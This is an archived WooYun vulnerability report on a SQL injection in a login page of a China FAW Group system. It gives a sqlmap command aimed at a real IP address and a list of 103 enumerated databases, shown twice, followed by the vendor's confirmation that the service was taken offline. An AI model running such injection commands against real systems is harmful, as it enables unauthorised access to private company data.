漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0171182
漏洞标题:中国第一汽车集团公司某系统POST注入(103个裤子)
相关厂商:中国第一汽车集团公司
漏洞作者: 头晕脑壳疼
提交时间:2016-01-20 15:26
修复时间:2016-01-21 14:28
公开时间:2016-01-21 14:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:厂商已经修复
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-21: 厂商已经确认,细节仅向厂商公开
2016-01-21: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
详细说明:
sqlmap -u "http://218.62.24.136/checklogin.asp" --data "login=111111&password=111111&login=111111&UserCode=111111"
available databases [103]:
[*] 192.168.1.11
[*] bbhz_jt
[*] CQ
[*] dcwbbs
[*] f2_jtjg
[*] f2_jtjg2007
[*] f2_jtjg201106
[*] f2_jtjg2011gz
[*] f2_jtjg630gzh
[*] f2_jtjgxz
[*] F2_ys2006
[*] F2_ys2006_old
[*] F2_ys2008
[*] F2_ys2009
[*] f2_ys2009bf
[*] F2_ys2010new
[*] F2_ys2011
[*] F2_ys2012
[*] F2_ys20121207
[*] F2_ys2012t53
[*] F2_ys2012t54
[*] F2_ys2012v91
[*] F2_ys2012X03
[*] F2_ys2013
[*] F2_ys2014
[*] F2_ys2014t53
[*] F2_ys2014t54
[*] F2_ys2014test
[*] F2_ys2014v91
[*] F2_ys2014X03
[*] F2_ys2014zz
[*] F2_ys2015
[*] F2_ys2015t53
[*] F2_ys2015t54
[*] F2_ys2015v91
[*] F2_ysd372011
[*] F2_ysf152011
[*] F2_ysf162011
[*] F2_ysjtjg2010
[*] F2_ysjtjg2011
[*] F2_ysjtjg2012
[*] F2_ysjtjg2013
[*] F2_ysjtjg2014
[*] F2_ysjtjg2015
[*] F2_ysjtjggf2012
[*] F2_ysjtjggf2013
[*] F2_ysjtjggf2014
[*] F2_ysjtjggf2015
[*] F2_ysjtzh2014
[*] F2_ysjtzh2015
[*] F2_ysjtzhgf2014
[*] F2_ysjtzhgf2015
[*] F2_ysx032011
[*] F2_ysxny2011
[*] F2_yszhkj2008
[*] F2_yszhkj2010
[*] F2_yszhkj2011
[*] F2_yszhkj2012
[*] F2_yszhkjgf2012
[*] f2_zjgcjg
[*] F2JTDATA
[*] F2JTDATA2006
[*] F2JTDATA2007
[*] f2jtdata2007_z
[*] F2JTDATA2010
[*] F2JTDATA201012
[*] F2JTDATA20130321
[*] F2JTDATA630q
[*] f2jtdata_2005
[*] F2JTDATAHB
[*] F2JTDATAHB20140423
[*] F2JTGFDATA
[*] F2JTGFDATA20111201
[*] F2JTgfDATA2012ks
[*] F2JTGFDATAHB
[*] F2JTGFDATAHB201311
[*] F2JTGFDATAHB2014
[*] F2JTGFDATAHB20140425
[*] F2JTGFDATAHBcs
[*] ffm
[*] ffm_2004
[*] ffm_whs
[*] ffm_zjgllx
[*] ffmdcwbbs
[*] FfmToJsc_Jcb
[*] hmxs2010
[*] hns2010
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] ReportHZ
[*] ReportHZ0610
[*] reporthz20150324
[*] ReportHZ630
[*] ReportHZgf
[*] ReportHZgz
[*] sjs
[*] tempdb
[*] ysbbs
[*] ysbbscgb
[*] zz
单单一个数据库都有一千多个表
漏洞证明:
sqlmap -u "http://218.62.24.136/checklogin.asp" --data "login=111111&password=111111&login=111111&UserCode=111111"
available databases [103]:
[*] 192.168.1.11
[*] bbhz_jt
[*] CQ
[*] dcwbbs
[*] f2_jtjg
[*] f2_jtjg2007
[*] f2_jtjg201106
[*] f2_jtjg2011gz
[*] f2_jtjg630gzh
[*] f2_jtjgxz
[*] F2_ys2006
[*] F2_ys2006_old
[*] F2_ys2008
[*] F2_ys2009
[*] f2_ys2009bf
[*] F2_ys2010new
[*] F2_ys2011
[*] F2_ys2012
[*] F2_ys20121207
[*] F2_ys2012t53
[*] F2_ys2012t54
[*] F2_ys2012v91
[*] F2_ys2012X03
[*] F2_ys2013
[*] F2_ys2014
[*] F2_ys2014t53
[*] F2_ys2014t54
[*] F2_ys2014test
[*] F2_ys2014v91
[*] F2_ys2014X03
[*] F2_ys2014zz
[*] F2_ys2015
[*] F2_ys2015t53
[*] F2_ys2015t54
[*] F2_ys2015v91
[*] F2_ysd372011
[*] F2_ysf152011
[*] F2_ysf162011
[*] F2_ysjtjg2010
[*] F2_ysjtjg2011
[*] F2_ysjtjg2012
[*] F2_ysjtjg2013
[*] F2_ysjtjg2014
[*] F2_ysjtjg2015
[*] F2_ysjtjggf2012
[*] F2_ysjtjggf2013
[*] F2_ysjtjggf2014
[*] F2_ysjtjggf2015
[*] F2_ysjtzh2014
[*] F2_ysjtzh2015
[*] F2_ysjtzhgf2014
[*] F2_ysjtzhgf2015
[*] F2_ysx032011
[*] F2_ysxny2011
[*] F2_yszhkj2008
[*] F2_yszhkj2010
[*] F2_yszhkj2011
[*] F2_yszhkj2012
[*] F2_yszhkjgf2012
[*] f2_zjgcjg
[*] F2JTDATA
[*] F2JTDATA2006
[*] F2JTDATA2007
[*] f2jtdata2007_z
[*] F2JTDATA2010
[*] F2JTDATA201012
[*] F2JTDATA20130321
[*] F2JTDATA630q
[*] f2jtdata_2005
[*] F2JTDATAHB
[*] F2JTDATAHB20140423
[*] F2JTGFDATA
[*] F2JTGFDATA20111201
[*] F2JTgfDATA2012ks
[*] F2JTGFDATAHB
[*] F2JTGFDATAHB201311
[*] F2JTGFDATAHB2014
[*] F2JTGFDATAHB20140425
[*] F2JTGFDATAHBcs
[*] ffm
[*] ffm_2004
[*] ffm_whs
[*] ffm_zjgllx
[*] ffmdcwbbs
[*] FfmToJsc_Jcb
[*] hmxs2010
[*] hns2010
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] ReportHZ
[*] ReportHZ0610
[*] reporthz20150324
[*] ReportHZ630
[*] ReportHZgf
[*] ReportHZgz
[*] sjs
[*] tempdb
[*] ysbbs
[*] ysbbscgb
[*] zz
单单一个数据库都有一千多个表
修复方案:
版权声明:转载请注明来源 头晕脑壳疼@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2016-01-21 14:28
厂商回复:
该业务已经下线,未及时关闭互联网访问,现已关闭互联网访问,感谢您的关注与支持。
最新状态:
2016-01-21:该业务已经下线,未及时关闭互联网访问,现已关闭互联网访问,感谢您的关注与支持。